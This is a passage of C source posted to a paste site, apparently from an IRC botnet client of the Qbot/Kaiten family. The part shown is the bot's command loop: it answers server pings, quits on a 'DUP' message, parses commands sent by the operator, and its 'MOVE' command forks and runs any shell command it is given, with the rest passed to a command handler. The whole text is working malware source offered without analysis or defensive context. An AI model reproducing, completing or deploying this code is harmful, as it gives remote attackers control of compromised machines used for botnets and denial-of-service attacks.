  2481. HackerPrint(D1ckSucka, "PONG");
  2482. continue;
  2483. }
  2484. if(strstr(commBuf, "DUP") == commBuf) exit(0);
  2485. unsigned char *message = commBuf;
  2486. if(*message == '!')
  2487. {
  2488. unsigned char *nickMask = message + 1;
  2489. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  2490. if(*nickMask == 0x00) continue;
  2491. *(nickMask) = 0x00;
  2492. nickMask = message + 1;
  2493. message = message + strlen(nickMask) + 2;
  2494. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  2495. unsigned char *command = message;
  2496. while(*message != ' ' && *message != 0x00) message++;
  2497. *message = 0x00;
  2498. message++;
  2499. unsigned char *tmpcommand = command;
  2500. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
  2501. if(strcmp(command, "MOVE") == 0)
  2502. {
  2503. unsigned char buf[1024];
  2504. int command;
  2505. if (listFork()) continue;
  2506. memset(buf, 0, 1024);
  2507. szprintf(buf, "%s 2>&1", message);
  2508. command = fdpopen(buf, "r");
  2509. while(fdgets(buf, 1024, command) != NULL)
  2510. {
  2511. trim(buf);
  2512. memset(buf, 0, 1024);
  2513. sleep(1);
  2514. }
  2515. fdpclose(command);
  2516. exit(0);
  2517. }
  2518. unsigned char *params[10];
  2519. int paramsCount = 1;
  2520. unsigned char *pch = strtok(message, " ");
  2521. params[0] = command;
  2522. while(pch)
  2523. {
  2524. if(*pch != '\n')
  2525. {
  2526. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  2527. memset(params[paramsCount], 0, strlen(pch) + 1);
  2528. strcpy(params[paramsCount], pch);
  2529. paramsCount++;
  2530. }
  2531. pch = strtok(NULL, " ");
  2532. }
  2533. processCmd(paramsCount, params);
  2534. if(paramsCount > 1)
  2535. {
  2536. int q = 1;
  2537. for(q = 1; q < paramsCount; q++)
  2538. {
  2539. free(params[q]);
  2540. }
  2541. }
  2542. }
  2543. }
  2544. }
  2545. return 0;
  2546. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement